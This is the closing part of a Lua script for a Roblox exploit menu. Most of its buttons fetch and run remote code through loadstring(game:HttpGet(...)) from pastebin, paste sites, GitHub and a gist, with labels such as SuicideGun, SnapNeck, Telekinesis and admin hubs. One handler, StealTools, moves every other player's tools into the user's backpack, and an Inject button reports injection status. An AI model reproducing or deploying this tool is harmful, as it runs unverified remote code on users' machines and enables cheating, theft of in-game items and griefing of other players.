		local function AZQUU_fake_script() -- idk.LocalScript 
			local script = Instance.new('LocalScript', idk)
	
			script.Parent.MouseButton1Click:Connect(function()
				script.Parent.Parent.Visible = false
				script.Parent.Parent.Parent.cool.Visible = true
			end)
		end
		coroutine.wrap(AZQUU_fake_script)()
		local function KRDU_fake_script() -- Next.LocalScript 
			local script = Instance.new('LocalScript', Next)
	
			script.Parent.MouseButton1Click:Connect(function()
				game.Players.LocalPlayer.PlayerGui.culgui.Frame.Page1.Visible = false
				game.Players.LocalPlayer.PlayerGui.culgui.Frame.Page2.Visible = true
			end)
		end
		coroutine.wrap(KRDU_fake_script)()
		local function KWCVD_fake_script() -- Previous.LocalScript 
			local script = Instance.new('LocalScript', Previous)
	
			script.Parent.MouseButton1Click:Connect(function()
				game.Players.LocalPlayer.PlayerGui.culgui.Frame.Page1.Visible = true
				game.Players.LocalPlayer.PlayerGui.culgui.Frame.Page2.Visible = false
			end)
		end
		coroutine.wrap(KWCVD_fake_script)()
		local function WZBJWV_fake_script() -- SuicideGun.LocalScript 
			local script = Instance.new('LocalScript', SuicideGun)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://pastebin.com/raw/TQGaAivj'),true))()
			end)
		end
		coroutine.wrap(WZBJWV_fake_script)()
		local function NGXJ_fake_script() -- GravityGun.LocalScript 
			local script = Instance.new('LocalScript', GravityGun)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://pastebin.com/raw/v4zD4kgk'),true))()
			end)
		end
		coroutine.wrap(NGXJ_fake_script)()
		local function VUSFSG_fake_script() -- StealTools.LocalScript 
			local script = Instance.new('LocalScript', StealTools)
	
			script.Parent.MouseButton1Click:Connect(function()
				for i,v in pairs (game.Players:GetChildren()) do
					wait()
					for i,b in pairs (v.Backpack:GetChildren()) do
						b.Parent = game.Players.LocalPlayer.Backpack
					end
				end
			end)
		end
		coroutine.wrap(VUSFSG_fake_script)()
		local function KPBJPGC_fake_script() -- DevUzi.LocalScript 
			local script = Instance.new('LocalScript', DevUzi)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/sauyx/raw'),true))()
			end)
		end
		coroutine.wrap(KPBJPGC_fake_script)()
		local function LDVGEY_fake_script() -- M4Carbine.LocalScript 
			local script = Instance.new('LocalScript', M4Carbine)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/58p5v/raw'),true))()
			end)
		end
		coroutine.wrap(LDVGEY_fake_script)()
		local function RCVSTQD_fake_script() -- Uzi.LocalScript 
			local script = Instance.new('LocalScript', Uzi)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/qekbr/raw'),true))()
			end)
		end
		coroutine.wrap(RCVSTQD_fake_script)()
		local function QAIMIDB_fake_script() -- AK47.LocalScript 
			local script = Instance.new('LocalScript', AK47)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/dpoak/raw'),true))()
			end)
		end
		coroutine.wrap(QAIMIDB_fake_script)()
		local function BWBRHZO_fake_script() -- M3GreaseGun.LocalScript 
			local script = Instance.new('LocalScript', M3GreaseGun)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/fd28o/raw'),true))()
			end)
		end
		coroutine.wrap(BWBRHZO_fake_script)()
		local function BIOAPZA_fake_script() -- Empty.LocalScript 
			local script = Instance.new('LocalScript', Empty)
	
			script.Parent.MouseButton1Click:Connect(function()
				print("empty")
			end)
		end
		coroutine.wrap(BIOAPZA_fake_script)()
		local function KVFZINX_fake_script() -- ElioBlasio.LocalScript 
			local script = Instance.new('LocalScript', ElioBlasio)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/4cbbc/raw'),true))()
			end)
		end
		coroutine.wrap(KVFZINX_fake_script)()
		local function HHLHYX_fake_script() -- TrueSSHub.LocalScript 
			local script = Instance.new('LocalScript', TrueSSHub)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://raw.githubusercontent.com/C00LMelon/True-SS-Hub/main/Protected.lua%20(4).txt'),true))()
			end)
		end
		coroutine.wrap(HHLHYX_fake_script)()
		local function EESJDWZ_fake_script() -- Sledgehammer.LocalScript 
			local script = Instance.new('LocalScript', Sledgehammer)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/nc6ug/raw'),true))()
			end)
		end
		coroutine.wrap(EESJDWZ_fake_script)()
		local function SIDTZ_fake_script() -- SwatBanisher.LocalScript 
			local script = Instance.new('LocalScript', SwatBanisher)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/9bm7z/raw'),true))()
			end)
		end
		coroutine.wrap(SIDTZ_fake_script)()
		local function DWPUVF_fake_script() -- NullwareHub.LocalScript 
			local script = Instance.new('LocalScript', NullwareHub)
	
			script.Parent.MouseButton1Click:Connect(function()
				getgenv().Theme = "Blue" -- To change the UI Theme, set this to one of the following options: "Red", "Purple", "Blue", "Green", "Yellow"
				loadstring(game:HttpGet("https://gist.githubusercontent.com/M6HqVBcddw2qaN4s/2d722888a388017c18028cd434c43a25/raw/dcccf1027fe4b90780e47767aaf584389c9d7771/EULma3fU90PUOKUn?identifier=".. (function()local a=""for b=1,256 do local c=math.random(1,3)a=a..string.char(c==1 and math.random(48,57)or c==2 and math.random(97,122)or c==3 and math.random(65,90))end;return a end)()))()
			end)
		end
		coroutine.wrap(DWPUVF_fake_script)()
		local function ZBVIDG_fake_script() -- PunchScript.LocalScript 
			local script = Instance.new('LocalScript', PunchScript)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://www.klgrth.io/paste/x75fk/raw", true))()
			end)
		end
		coroutine.wrap(ZBVIDG_fake_script)()
		local function EEHAXII_fake_script() -- _500PoundsBall.LocalScript 
			local script = Instance.new('LocalScript', _500PoundsBall)
	
			script.Parent.MouseButton1Click:Connect(function()
				_G.specifictoolname = false
				_G.toolname = "BoomBox"
				loadstring(game:HttpGet('https://raw.githubusercontent.com/DigitalityScripts/roblox-scripts/main/500%20Pounds%20Converted%20%5B1%20Tool%5D.lua'))()
			end)
		end
		coroutine.wrap(EEHAXII_fake_script)()
		local function YQCH_fake_script() -- GKV3.LocalScript 
			local script = Instance.new('LocalScript', GKV3)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/mvzr4/raw'),true))()
			end)
		end
		coroutine.wrap(YQCH_fake_script)()
		local function ZYUOII_fake_script() -- GrabKnifeV4.LocalScript 
			local script = Instance.new('LocalScript', GrabKnifeV4)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/sbgey/raw'),true))()
			end)
		end
		coroutine.wrap(ZYUOII_fake_script)()
		local function FEEHPXJ_fake_script() -- GermanSoldier.LocalScript 
			local script = Instance.new('LocalScript', GermanSoldier)
	
			script.Parent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet(('https://www.klgrth.io/paste/xh5uw/raw'),true))()
			end)
		end
		coroutine.wrap(FEEHPXJ_fake_script)()
		local function CSWHTJ_fake_script() -- idk_2.LocalScript 
			local script = Instance.new('LocalScript', idk_2)
	
			script.Parent.MouseButton1Click:Connect(function()
				script.Parent.Parent.Parent.Settings.Visible = true
				script.Parent.Parent.Parent.cool.Visible = false
			end)
		end
		coroutine.wrap(CSWHTJ_fake_script)()
		local function NYJLESP_fake_script() -- CloseOpen.LocalScript 
			local script = Instance.new('LocalScript', CloseOpen)
	
			script.Parent.MouseButton1Click:connect(function()
				if script.Parent.Parent.Frame.Visible == false then
					script.Parent.Parent.Frame.Visible = true
	
				else
					script.Parent.Parent.Frame.Visible = false
				end
			end)
		end
		coroutine.wrap(NYJLESP_fake_script)()
	end)
end
coroutine.wrap(VPJFTO_fake_script)()
local function CCLMBX_fake_script() -- Telekinesis.Script 
	local script = Instance.new('Script', Telekinesis)

	script.Parent.MouseButton1Down:connect(function()
		loadstring(game:HttpGet("https://www.klgrth.io/paste/8w699/raw", true))()
	end)
end
coroutine.wrap(CCLMBX_fake_script)()
local function NSDSU_fake_script() -- IYAdmin.Script 
	local script = Instance.new('Script', IYAdmin)

	script.Parent.MouseButton1Down:connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
	end)
end
coroutine.wrap(NSDSU_fake_script)()
local function DAMAZRS_fake_script() -- SnapNeck.Script 
	local script = Instance.new('Script', SnapNeck)

	script.Parent.MouseButton1Down:connect(function()
		loadstring(game:HttpGet("https://www.klgrth.io/paste/vav87/raw", true))()
	end)
end
coroutine.wrap(DAMAZRS_fake_script)()
local function ONKZPN_fake_script() -- Clear.LocalScript 
	local script = Instance.new('LocalScript', Clear)

	local box = script.Parent.Parent.Parent.MainFrame.Input
	script.Parent.MouseButton1Click:Connect(function()
		box.Text = ""
	end)
end
coroutine.wrap(ONKZPN_fake_script)()
local function MZBPQNJ_fake_script() -- MainFrame.DragGui 
	local script = Instance.new('LocalScript', MainFrame)

	local UserInputService = game:GetService("UserInputService")
	
	local gui = script.Parent
	
	local dragging
	local dragInput
	local dragStart
	local startPos
	
	local function update(input)
		local delta = input.Position - dragStart
		gui.Position = gui:TweenPosition(UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y), 'Out', 'Linear', 0, true); -- drag speed
	end
	
	gui.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = gui.Position
			
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragging = false
				end
			end)
		end
	end)
	
	gui.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			dragInput = input
		end
	end)
	
	UserInputService.InputChanged:Connect(function(input)
		if input == dragInput and dragging then
			update(input)
		end
	end)
end
coroutine.wrap(MZBPQNJ_fake_script)()
local function XYVJL_fake_script() -- Inject.LocalScript 
	local script = Instance.new('LocalScript', Inject)

	local text = script.Parent.Parent.Parent.other.Injected
	script.Parent.MouseButton1Click:Connect(function()
		text.Text = "Status : Injected"
		print("injected!")
	end)
end
coroutine.wrap(XYVJL_fake_script)()
local function HNSX_fake_script() -- Close.LocalScript 
	local script = Instance.new('LocalScript', Close)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:Remove()
	end)
	
end
coroutine.wrap(HNSX_fake_script)()
